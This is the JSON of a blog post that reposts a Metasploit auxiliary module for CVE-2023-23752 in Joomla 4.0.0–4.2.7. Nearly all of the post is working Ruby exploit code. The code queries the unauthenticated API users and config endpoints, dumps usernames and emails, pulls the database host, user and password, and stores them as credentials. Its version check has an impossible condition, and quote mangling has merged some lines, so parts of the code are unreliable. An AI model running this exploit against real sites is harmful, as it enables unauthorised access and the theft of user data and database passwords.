{"id":59351,"date":"2024-09-01T20:29:32","date_gmt":"2024-09-01T17:29:32","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181178\/joomla_api_improper_access_checks.rb.txt"},"modified":"2024-09-01T20:29:32","modified_gmt":"2024-09-01T17:29:32","slug":"joomla-api-improper-access-checks","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/joomla-api-improper-access-checks\/","title":{"rendered":"Joomla API Improper Access Checks"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Joomla<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘Joomla API Improper Access Checks’,
‘Description’ => %q{
Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability.
This vulnerability allows unauthenticated users access to webservice endpoints which contain
sensitive information. Specifically for this module we exploit the users and config\/application
endpoints.<\/p>\n

This module was tested against Joomla 4.2.7 running on Docker.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘h00die’, # msf module
‘Tianji Lab’, # original PoC, analysis
],
‘References’ => [
[‘EDB’, ‘51334’],
[‘URL’, ‘https:\/\/developer.joomla.org\/security-centre\/894-20230201-core-improper-access-check-in-webservice-endpoints.html’],
[‘URL’, ‘https:\/\/nsfocusglobal.com\/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice\/’],
[‘URL’, ‘https:\/\/attackerkb.com\/topics\/18qrh3PXIX\/cve-2023-23752’],
[‘CVE’, ‘2023-23752’],
],
‘Targets’ => [
[‘Joomla 4.0.0 – 4.2.7’, {}],
],
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘Reliability’ => [],
‘SideEffects’ => [IOC_IN_LOGS]},
‘DisclosureDate’ => ‘2023-02-01’,
‘DefaultTarget’ => 0
)
)
# set the default port, and a URI that a user can set if the app isn’t installed to the root
register_options(
[
Opt::RPORT(80),
OptString.new(‘TARGETURI’, [true, ‘The URI of the Joomla Application’, ‘\/’]),
])
end<\/p>\n

def check_host(_ip)
unless joomla_and_online?
return Exploit::CheckCode::Unknown(“#{peer} – Could not connect to web service or not detected as Joomla”)
end<\/p>\n

version = joomla_version
if version.nil?
return Exploit::CheckCode::Safe(“#{peer} – Unable to determine Joomla Version”)
end<\/p>\n

vprint_status(“Joomla version detected: #{version}”)
ver_no = Rex::Version.new(version)
if ver_no < Rex::Version.new(‘4.0.0’) && ver_no >= Rex::Version.new(‘4.2.8’)
return Exploit::CheckCode::Safe(“Joomla version #{ver_no} is NOT vulnerable”)
end<\/p>\n

Exploit::CheckCode::Appears(“Joomla version #{ver_no} is vulnerable”)
end<\/p>\n

def run_host(ip)
vprint_status(‘Attempting user enumeration’)
res = send_request_cgi(
‘uri’ => normalize_uri(target_uri.path, ‘api’, ‘index.php’, ‘v1’, ‘users’),
‘headers’ => {
# header is needed, it passes back JSON anyways.
‘Accept’ => ‘*\/*’
},
‘vars_get’ => {
‘public’ => ‘true’
}
)
fail_with(Failure::Unreachable, “#{peer} – Could not connect to web service – no response”) if res.nil?
fail_with(Failure::UnexpectedReply, “#{peer} – Page didn’t load correctly (response code: #{res.code})”) unless res.code == 200<\/p>\n

tbl = Rex::Text::Table.new(
‘Header’ => ‘Joomla Users’,
‘Indent’ => 1,
‘Columns’ => [‘ID’, ‘Super User’, ‘Name’, ‘Username’, ‘Email’, ‘Send Email’, ‘Register Date’, ‘Last Visit Date’, ‘Group Names’])<\/p>\n

users = res.get_json_document
fail_with(Failure::UnexpectedReply, ‘JSON document not returned’) unless users # < json data wasn’t properly formatted
fail_with(Failure::UnexpectedReply, “‘data’ field in JSON document not found”) unless users[‘data’] # < json data was properly formatted by the expected key wasn’t present<\/p>\n

loot_path = store_loot(‘joomla.users’, ‘application\/json’, ip, res.body, ‘Joomla Users’)
print_good(“Users JSON saved to #{loot_path}”)<\/p>\n

users = users[‘data’]users.each do |user|
unless user[‘type’] == ‘users’
next
end<\/p>\n

tbl << [
user[‘attributes’][‘id’].to_s,
user[‘attributes’][‘group_names’].include?(‘Super Users’) ? ‘*’ : ”,
user[‘attributes’][‘name’].to_s,
user[‘attributes’][‘username’].to_s,
user[‘attributes’][’email’].to_s,
user[‘attributes’][‘sendEmail’].to_s,
user[‘attributes’][‘registerDate’].to_s,
user[‘attributes’][‘lastvisitDate’].to_s,
user[‘attributes’][‘group_names’].to_s,
]end<\/p>\n

print_good(tbl.to_s)<\/p>\n

vprint_status(‘Attempting config enumeration’)
res = send_request_cgi(
‘uri’ => normalize_uri(target_uri.path, ‘api’, ‘index.php’, ‘v1’, ‘config’, ‘application’),
‘headers’ => {
# header is needed, it passes back JSON anyways.
‘Accept’ => ‘*\/*’
},
‘vars_get’ => {
‘public’ => ‘true’
}
)<\/p>\n

fail_with(Failure::Unreachable, “#{peer} – Could not connect to web service – no response”) if res.nil?
fail_with(Failure::UnexpectedReply, “#{peer} – Page didn’t load correctly (response code: #{res.code})”) unless res.code == 200<\/p>\n

tbl = Rex::Text::Table.new(
‘Header’ => ‘Joomla Config’,
‘Indent’ => 1,
‘Columns’ => [‘Setting’, ‘Value’])<\/p>\n

config = res.get_json_document
fail_with(Failure::UnexpectedReply, ‘JSON document not returned’) unless config # < json data wasn’t properly formatted
fail_with(Failure::UnexpectedReply, “‘data’ field in JSON document not found”) unless config[‘data’] # < json data was properly formatted by the expected key wasn’t present<\/p>\n

loot_path = store_loot(‘joomla.config’, ‘application\/json’, ip, res.body, ‘Joomla Config’)
print_good(“Config JSON saved to #{loot_path}”)<\/p>\n

config = config[‘data’]credential_data = {
protocol: ‘tcp’,
workspace_id: myworkspace_id,
port: 1, # we dont get this data back so just set it to something obviously wrong instead of guessing
origin_type: :service,
private_type: :password,
module_fullname: fullname,
status: Metasploit::Model::Login::Status::UNTRIED
}
config.each do |setting|
if setting[‘attributes’].key?(‘dbtype’)
credential_data[:service_name] = setting[‘attributes’][‘dbtype’].to_s
if setting[‘attributes’][‘dbtype’].to_s == ”
credential_data[:port] = ‘3306’ # taking a guess since this info isn’t returned but is required for create_credential_and_login
end
tbl << [‘dbtype’, setting[‘attributes’][‘dbtype’].to_s]elsif setting[‘attributes’].key?(‘host’)
credential_data[:address] = setting[‘attributes’][‘host’].to_s
tbl << [‘db host’, setting[‘attributes’][‘host’].to_s]elsif setting[‘attributes’].key?(‘password’)
credential_data[:private_data] = setting[‘attributes’][‘password’]tbl << [‘db password’, setting[‘attributes’][‘password’].to_s]elsif setting[‘attributes’].key?(‘user’)
credential_data[:username] = setting[‘attributes’][‘user’].to_s
tbl << [‘db user’, setting[‘attributes’][‘user’].to_s]elsif setting[‘attributes’].key?(‘db’)
tbl << [‘db name’, setting[‘attributes’][‘db’].to_s]elsif setting[‘attributes’].key?(‘dbprefix’)
tbl << [‘db prefix’, setting[‘attributes’][‘dbprefix’].to_s]elsif setting[‘attributes’].key?(‘dbencryption’)
tbl << [‘db encryption’, setting[‘attributes’][‘dbencryption’].to_s]end
end
# if db host isn’t a FQDN or IP, this will silently fail to save.
create_credential_and_login(credential_data)<\/p>\n

print_good(tbl.to_s)
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::Reportinclude Msf::Exploit::Remote::HTTP::Joomla def initialize(info = {})super(update_info(info,‘Name’ => ‘Joomla API Improper Access Checks’,‘Description’ => %q{Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability.This vulnerability allows unauthenticated users access to webservice endpoints which containsensitive information. Specifically for this …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59351","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59351"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59351\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}